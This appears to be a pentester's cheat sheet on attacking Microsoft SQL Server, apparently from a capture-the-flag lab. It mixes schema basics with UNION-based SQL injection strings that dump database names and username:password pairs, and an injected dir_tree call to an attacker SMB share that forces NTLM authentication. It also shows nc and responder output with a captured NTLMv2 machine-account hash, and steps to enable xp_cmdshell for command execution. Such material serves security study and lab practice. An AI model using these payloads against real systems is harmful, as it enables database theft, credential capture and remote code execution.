In SQL Server, each table belongs to a specific schema (e.g., dbo, sales, hr, etc.). If you do not specify a schema, SQL Server assumes dbo by default. The table might exist under a different schema.
SELECT * from flags;
// ('42S02', "[42S02] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Invalid object name '#flags'. (208) (SQLExecDirectW)")
In this case, the database context must be specified explicitly.
SELECT * from app.dbo.flags;
Below are the default MSSQL system schemas.
Schema
Description
master
Keeps the information for an instance of SQL Server
msdb
Used by SQL Server Agent
model
Template database copied for each new database
resource
Read-only, keeps sys objects visible in every server database in sys schema
tempdb
Keeps temporary objects for SQL queries
Users
sa is the default administrator-level account in MSSQL.
Usage
SELECT @@version;
SELECT system_user;
SELECT name FROM sys.databases;
SELECT * FROM <database>.information_schema.tables;
SELECT column_name, data_type FROM <database>.information_schema.columns WHERE table_name = '<tableName>';
When querying from a CLI tool, a SQL statement must be submitted ending with ; followed by a GO on a separate line.
q=anger' ORDER BY 1;--
q=anger' UNION SELECT NULL;--
q=anger' UNION SELECT 1;--
q=anger1' UNION SELECT 'a',2,3,4,5,6;-- -
# check connection back with nc on port 445, and then responder
q=anger1'; exec dir_tree '\\<attack-ip>\\sharename\file'--
# first connection
sudo nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.14.121] from (UNKNOWN) [10.10.11.158] 50883
E�SMBrS�����"NT LM 0.12SMB 2.002SMB 2.???^C
# second connection
sudo responder -I tun0
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.158
[SMB] NTLMv2-SSP Username : streamIO\DC$
[SMB] NTLMv2-SSP Hash : DC$::streamIO:c45d729b18399cdd:DC47BA38B0757F30605D68A6D5B969FE:0101000000000000803B7DFBB994DA011011EEA196276E730000000002000800410043004F00410001001E00570049004E002D005500500046004200320059003900580030005400520004003400570049004E002D00550050004600420032005900390058003000540052002E00410043004F0041002E004C004F00430041004C0003001400410043004F0041002E004C004F00430041004C0005001400410043004F0041002E004C004F00430041004C0007000800803B7DFBB994DA0106000400020000000800300030000000000000000000000000300000EC58810B0121088E8266094DE4E2D0B2340D33D1D6BE1317A3BA66F26DE4CFBE0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100320031000000000000000000
# wildcards in MSSQL
SELECT * FROM movies WHERE name LIKE '%anger%';
SELECT * FROM movies WHERE CONTAINS (name,'*500*');
q=anger1' UNION SELECT 1,@@version,3,4,5,6;--
q=anger1' UNION SELECT 1,name,3,4,5,6 FROM master..sysdatabases--
q=anger1' UNION SELECT 1,name,3,4,5,6 FROM sys.databases--
q=anger1' UNION SELECT 1,CONCAT(name,':',id),3,4,5,6 FROM streamio..sysobjects--
q=anger1' UNION SELECT 1,name,3,4,5,6 FROM streamio..syscolumns WHERE id=901578250--
q=anger1' UNION SELECT 1,(SELECT STRING_AGG(CONCAT(username,':',password),'|') FROM users),3,4,5,6--
RCE
xp_cmdshell is disabled by default.
Usually functions that can result in are either disabled or restricted to privileged users. In MSSQL, the xp_cmdshell function takes a string, passes it to a command shell for execution, and returns the output as rows of text. Typically, stacked queries need to be exploited to achieve RCE via a SQLi flaw.
// allow advanced options to be modified
EXECUTE sp_configure 'show advanced options', 1;
GO
// update currently configured value for advanced options
RECONFIGURE;
GO
// enable the feature
EXECUTE sp_configure 'xp_cmdshell', 1;
GO
// update the currently configured value for this feature
RECONFIGURE;
GO
Once the feature is enabled, the command is run in a shell with the same permissions as the SQL Server service account.
The Linux version of MSSQL does not support xp_cmdshell.
// use feature
EXECUTE xp_cmdshell 'command to run here';
